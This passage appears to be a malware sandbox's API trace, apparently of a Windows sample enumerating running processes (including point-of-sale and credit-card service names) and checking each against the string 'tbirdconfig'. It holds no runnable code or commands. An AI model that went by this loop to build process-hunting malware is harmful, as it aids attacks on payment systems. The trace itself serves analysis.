CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0095.344] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3572fd8 [0095.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3572fd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0095.344] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0095.344] StrStrIA (lpFirst="ccv_server.exe", lpSrch="tbirdconfig") returned 0x0 [0095.344] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0095.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0095.345] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3574768 [0095.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3574768, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0095.345] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0095.345] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="tbirdconfig") returned 0x0 [0095.345] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0095.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0095.347] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3574788 [0095.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3574788, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0095.347] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0095.347] StrStrIA (lpFirst="creditservice.exe", lpSrch="tbirdconfig") returned 0x0 [0095.347] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0095.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.349] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572f60 [0095.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3572f60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0095.349] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0095.349] StrStrIA (lpFirst="edcsvr.exe", lpSrch="tbirdconfig") returned 0x0 [0095.349] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0095.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.350] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3572e40 [0095.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3572e40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0095.350] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0095.350] StrStrIA (lpFirst="fpos.exe", lpSrch="tbirdconfig") returned 0x0 [0095.350] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0095.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.351] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572e58 [0095.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3572e58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0095.351] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0095.352] StrStrIA (lpFirst="isspos.exe", lpSrch="tbirdconfig") returned 0x0 [0095.352] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0095.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.353] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35744a8 [0095.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x35744a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0095.353] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0095.353] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="tbirdconfig") returned 0x0 [0095.353] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0095.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.354] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572f90 [0095.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3572f90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0095.355] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0095.355] StrStrIA (lpFirst="omnipos.exe", lpSrch="tbirdconfig") returned 0x0 [0095.355] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0095.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.356] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573068 [0095.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3573068, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0095.356] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0095.356] StrStrIA (lpFirst="spcwin.exe", lpSrch="tbirdconfig") returned 0x0 [0095.356] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0095.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0095.357] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x35746c8 [0095.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x35746c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0095.357] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0095.357] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="tbirdconfig") returned 0x0 [0095.357] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0095.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.359] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3573020 [0095.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3573020, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0095.359] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0095.359] StrStrIA (lpFirst="utg2.exe", lpSrch="tbirdconfig") returned 0x0 [0095.359] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0095.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.360] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572f48 [0095.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3572f48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0095.360] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0095.360] StrStrIA (lpFirst="saying.exe", lpSrch="tbirdconfig") returned 0x0 [0095.360] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0095.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.361] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3572ed0 [0095.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3572ed0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0095.362] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0095.362] StrStrIA (lpFirst="ripe.exe", lpSrch="tbirdconfig") returned 0x0 [0095.362] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0095.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.363] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572d98 [0095.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3572d98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0095.363] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0095.363] StrStrIA (lpFirst="acoustic.exe", lpSrch="tbirdconfig") returned 0x0 [0095.363] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0095.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.364] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3572fa8 [0095.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3572fa8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0095.364] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0095.364] StrStrIA (lpFirst="mail.exe", lpSrch="tbirdconfig") returned 0x0 [0095.364] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0095.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.366] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572ee8 [0095.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3572ee8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0095.366] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0095.366] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="tbirdconfig") returned 0x0 [0095.366] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.368] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572e70 [0095.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572e70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.368] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.368] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.368] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0095.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.369] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572e88 [0095.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3572e88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.369] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0095.369] StrStrIA (lpFirst="dllhost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.369] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0095.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.370] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572eb8 [0095.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3572eb8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0095.371] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0095.371] StrStrIA (lpFirst="taskhostw.exe", lpSrch="tbirdconfig") returned 0x0 [0095.371] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0095.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.372] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572f18 [0095.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3572f18, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0095.372] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0095.372] StrStrIA (lpFirst="UsoClient.exe", lpSrch="tbirdconfig") returned 0x0 [0095.372] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0095.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.373] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572f30 [0095.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3572f30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0095.373] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0095.373] StrStrIA (lpFirst="taskhostw.exe", lpSrch="tbirdconfig") returned 0x0 [0095.373] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0095.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0095.375] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3574708 [0095.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3574708, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0095.375] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0095.375] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="tbirdconfig") returned 0x0 [0095.375] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0095.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.376] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35744c8 [0095.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x35744c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0095.376] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0095.376] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="tbirdconfig") returned 0x0 [0095.376] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, 